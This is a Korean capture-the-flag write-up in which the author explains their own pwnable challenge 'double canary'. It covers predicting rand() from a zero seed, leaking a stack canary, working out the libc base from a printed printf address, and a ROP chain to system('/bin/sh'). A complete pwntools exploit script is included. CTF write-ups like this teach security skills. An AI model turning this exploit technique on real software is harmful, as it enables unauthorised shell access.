[2023 JBU CTF] double canary write-up

분야 : Pwnable

💡 2023 JBU CTF에서 내가 출제한 문제에 대한 write-up이다.

😭 v6에 r_rum 값을 왜 넣어줬지..? 그래서 그냥 Canary Leak 문제가 되어 버렸다 ㅎ.ㅎ

😭 더 웃기고 슬픈건, 나는 인지하지 못한 채로 라업을 작성했다... 그럴 수 있지 없다.

 

 

🧐 문제

문제명 : double canary

Canary 보호기법이 걸려있어서 Canary 값을 우회하여 익스플로잇하는 문제이다.

bof가 발생하고, printf함수 주소를 출력해주므로, LibcBase를 얻어서 원하는 함수를 호출하여 system함수를 호출하여 셸을 얻는 문제이다.

 

위 구성이 문제파일로 제공된다. 로컬에서 도커 컨테이너를 올려 익스플로잇을 진행하고, 동일한 페이로드를 서버에 전송하면 셸을 획득할 수 있다. 이 문제는 libc파일이 제공된다.

 

🧐 분석

문제 설명에서 말했듯이 Canary가 걸려있다. 문제 바이너리를 분석해보자.

 

main함수이다. main 함수의 분석은 다음과 같다.

🧐 printf의 주소를 출력해주고 있다. 따라서, printf offset만큼 빼서 libc base를 구할 수 있다.

🧐 nbytes에서 Name Size를 입력받기 때문에, v10변수에서 bof가 발생한다.

🧐 이 문제에선 프로그램이 시작할 때 rand함수를 통해 랜덤 값을 v8변수로 저장하여 프로그램 종료 전에 이를 확인한다. 하지만, srand(0)으로 seed를 생성하고 rand함수를 호출하면 r_num와 동일한 값을 얻을 수 있다.

🧐 **v8(rbp-0x5c)**는 v10(rbp-0x50)보다 낮은 주소를 가지고 있기 때문에 Index Values에 offset만큼 입력하여 v8부터 데이터를 입력 받을 수 있다.

하지만, 카나리 값 변조를 체크하여 프로그램이 종료될 것이다.

main함수의 21번째 줄에서 vuln함수가 실행된다. 이 함수에서 카나리를 leak할 수 있다.

 

vuln함수에서도 길이를 입력하여, 그 만큼 입력받기 때문에 bof가 발생한다.

🧐 이 함수에도 return 시 카나리 값 변조를 체크하게 되는데, 해당 함수에서는 v3 하위 1byte를 0으로 바꿔준다. 따라서, 카나리 변수의 하위 0x00을 다른 값으로 덮고, 이를 printf출력으로 값을 leak하고도 다시 0x00으로 덮어서 정상적으로 return할 수 있다.

공격 시나리오는 다음과 같다.

 

1. srand함수의 seed를 0으로 하고, rand함수를 실행하여 랜덤 값을 얻는다.
2. printf주소를 통해 offset을 계산하여 system함수 주소를 얻는다.
3. vuln함수에서 카나리를 1bytes 덮어 printf로 카나리 값을 얻는다.
4. *Index Values(v8(rbp-0x5c)-v10(rbp-0x50))로 *12를 입력한다.
5. main함수의 bof에서 각 변수의 검증 부분을 구성하여 익스플로잇한다.

 

💡 페이로드

r_num + A*0x5c + canary + B*0x8 + ret(gadget) + pop rdi(gadget) + &'/bin/sh' + &system

 

🧐 익스플로잇

from pwn import *
from ctypes import *
import time
#context.log_level='debug'

# rand()
libc_ = CDLL('./libc.so.6')
#seed = libc_.time()
libc_.srand(0)
random = libc_.rand()

#gadget
ret = 0x000000000040101a
pop_rdi = 0x0000000000401573

# init
libc = ELF('./libc.so.6')
e = ELF("./double_canary")
p = process('./double_canary')
#p = remote('192.168.83.137', 13573)

# libc leak
p.recvuntil('printf : ')
printf = int(p.recv(14), 16)
libc_base = printf-libc.sym["printf"]
system = libc_base + libc.sym['system']
sh = libc_base + list(libc.search(b'/bin/sh'))[0]

print('printf :', hex(printf))
print('libc_base :', hex(libc_base))
print('system :', hex(system))
print('sh :', hex(sh))

# canary leak
payload = b'A' * (0x18 + 1)

p.sendlineafter(b'Name Size :',str(len(payload)))
p.sendafter(b'Name :',payload)

p.recvuntil(payload)
canary = u64(b'\x00' + p.recvn(7))
print('canary :',hex(canary))

# exploit
payload = p64(random)
payload += b'A' * (4 + 0x48)
payload += p64(canary)
payload += b'B' * 8
payload += p64(ret)
payload += p64(pop_rdi)
payload += p64(sh)
payload += p64(system)

# debug
#gdb.attach(p)
#pause()

p.sendlineafter(b'Index Value(Name-Index) :',str(12))
p.sendlineafter(b'Name Size :',str(len(payload)))
p.sendafter(b'Name :',payload)

p.interactive()

해당 exploit 코드를 실행하면 셸을 얻을 수 있다.